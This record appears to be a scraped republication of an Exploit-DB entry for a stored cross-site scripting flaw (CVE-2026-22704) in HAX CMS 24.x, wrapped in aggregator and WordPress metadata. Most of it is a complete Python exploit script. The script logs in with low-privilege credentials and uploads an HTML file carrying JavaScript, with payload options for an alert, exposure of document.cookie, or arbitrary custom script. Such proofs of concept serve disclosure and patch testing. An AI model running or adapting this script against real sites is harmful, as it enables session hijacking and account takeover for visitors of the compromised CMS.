{“lastseen”:”2026-04-29T11:27:57″,”description”:”Exploit Title: HAX CMS 24.x – Stored Cross-Site Scripting XSS Date: 2026-01-28 Google Dork: \\”N\/A\\” Author: Mohammed Idrees Banyamer Author Country: Jordan Instagram: @banyamersecurity Vendor Homepage: https:\/\/www.drupal.org\/project\/hax Software Link:…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”exploitdb”,”title”:”HAX CMS 24.x – Stored Cross-Site Scripting (XSS)”,”source”:””,”references”:””,”id”:”EDB-ID:52526″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-22704″],”sourceData”:”# Exploit Title: HAX CMS 24.x – Stored Cross-Site Scripting (XSS)\\r\\n# Date: 2026-01-28\\r\\n# Google Dork: \\”N\/A\\”\\r\\n# Author: Mohammed Idrees Banyamer\\r\\n# Author Country: Jordan\\r\\n# Instagram: @banyamer_security\\r\\n# Vendor Homepage: https:\/\/www.drupal.org\/project\/hax\\r\\n# Software Link: https:\/\/github.com\/elmsln\/haxcms\\r\\n# Version: \\u003c= 24.x (tested)\\r\\n# Tested on: Linux\\r\\n# CVE: CVE-2026-22704\\r\\n#\\r\\n# Description:\\r\\n# HAX CMS allows low-privileged authenticated users to upload HTML files\\r\\n# without proper content sanitization. Uploaded HTML files are rendered\\r\\n# directly by the application, leading to a Stored Cross-Site Scripting (XSS)\\r\\n# vulnerability when accessed by other users.\\r\\n#\\r\\n#\\r\\n# Usage:\\r\\n# python3 haxcms_stored_xss.py –target http:\/\/TARGET –user USER –password PASS\\r\\n#\\r\\n\\r\\n\\r\\nimport argparse\\r\\nimport requests\\r\\nfrom urllib.parse import urljoin\\r\\n\\r\\n\\r\\ndef create_poc_html(payload_type=\\”alert\\”):\\r\\n \\”\\”\\”\\r\\n Generate HTML PoC file.\\r\\n Payload types:\\r\\n – alert : simple JS alert (default)\\r\\n – cookie : cookie access demonstration\\r\\n – custom : user supplied JavaScript\\r\\n \\”\\”\\”\\r\\n\\r\\n if payload_type == \\”cookie\\”:\\r\\n js_payload = \\”\\”\\”\\r\\n alert(\\”PoC: document.cookie = \\” + document.cookie);\\r\\n \\”\\”\\”\\r\\n elif payload_type == \\”alert\\”:\\r\\n js_payload = \\”\\”\\”\\r\\n alert(\\”Stored XSS PoC – CVE-2026-22704\\”);\\r\\n \\”\\”\\”\\r\\n else:\\r\\n js_payload = payload_type\\r\\n\\r\\n return f\\”\\”\\”\\u003c!DOCTYPE html\\u003e\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\r\\n \\u003cmeta charset=\\”UTF-8\\”\\u003e\\r\\n \\u003ctitle\\u003ePoC\\u003c\/title\\u003e\\r\\n\\u003c\/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n \\u003ch2\\u003eHAX CMS Stored XSS PoC\\u003c\/h2\\u003e\\r\\n \\u003cscript\\u003e\\r\\n {js_payload.strip()}\\r\\n \\u003c\/script\\u003e\\r\\n\\u003c\/body\\u003e\\r\\n\\u003c\/html\\u003e\\r\\n\\”\\”\\”\\r\\n\\r\\n\\r\\ndef upload_file(target, username, password, filename, content):\\r\\n session = requests.Session()\\r\\n\\r\\n login_url = urljoin(target, \\”\/user\/login\\”)\\r\\n login_data = {\\r\\n \\”name\\”: username,\\r\\n \\”pass\\”: password,\\r\\n \\”form_id\\”: \\”user_login_form\\”,\\r\\n \\”op\\”: \\”Log in\\”\\r\\n }\\r\\n\\r\\n print(\\”[*] Logging in…\\”)\\r\\n r = session.post(login_url, data=login_data, allow_redirects=True)\\r\\n\\r\\n if \\”log out\\” not in r.text.lower():\\r\\n print(\\”[!] Login failed\\”)\\r\\n return False\\r\\n\\r\\n print(\\”[+] Login successful\\”)\\r\\n\\r\\n upload_url = urljoin(target, \\”\/files\/upload\\”)\\r\\n files = {\\r\\n \\”files[upload]\\”: (filename, content.encode(), \\”text\/html\\”)\\r\\n }\\r\\n\\r\\n print(\\”[*] Uploading HTML file…\\”)\\r\\n r = session.post(upload_url, files=files)\\r\\n\\r\\n if r.status_code not in (200, 201, 302):\\r\\n print(\\”[!] Upload failed\\”)\\r\\n return False\\r\\n\\r\\n file_url = urljoin(target, f\\”\/sites\/default\/files\/{filename}\\”)\\r\\n print(\\”[+] File uploaded successfully\\”)\\r\\n print(\\”[+] PoC URL:\\”)\\r\\n print(file_url)\\r\\n\\r\\n return True\\r\\n\\r\\n\\r\\ndef main():\\r\\n parser = argparse.ArgumentParser(description=\\”HAX CMS Stored XSS PoC (CVE-2026-22704)\\”)\\r\\n parser.add_argument(\\”–target\\”, required=True, help=\\”Target base URL\\”)\\r\\n parser.add_argument(\\”–user\\”, required=True, help=\\”Low privilege username\\”)\\r\\n parser.add_argument(\\”–password\\”, required=True, help=\\”Password\\”)\\r\\n parser.add_argument(\\”–payload\\”, default=\\”alert\\”,\\r\\n choices=[\\”alert\\”, \\”cookie\\”, \\”custom\\”],\\r\\n help=\\”PoC payload type\\”)\\r\\n parser.add_argument(\\”–filename\\”, default=\\”poc.html\\”,\\r\\n help=\\”Uploaded file name\\”)\\r\\n\\r\\n args = parser.parse_args()\\r\\n\\r\\n if args.payload == \\”custom\\”:\\r\\n js = input(\\”[?] Enter custom JavaScript payload:\\\\n\\u003e \\”)\\r\\n html = create_poc_html(js)\\r\\n else:\\r\\n html = create_poc_html(args.payload)\\r\\n\\r\\n upload_file(\\r\\n args.target.rstrip(\\”\/\\”),\\r\\n args.user,\\r\\n args.password,\\r\\n args.filename,\\r\\n html\\r\\n )\\r\\n\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52526″,”cvss”:{“score”:8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:H\/PR:L\/UI:R\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52526″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-29T11:27:57″,”description”:”Exploit Title: HAX CMS 24.x – Stored Cross-Site Scripting XSS Date: 2026-01-28 Google Dork: \\”N\/A\\” Author: Mohammed Idrees Banyamer Author Country: Jordan Instagram: @banyamersecurity Vendor…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,83,12,40,15,13,7,11,5],"class_list":["post-50118","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-80","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n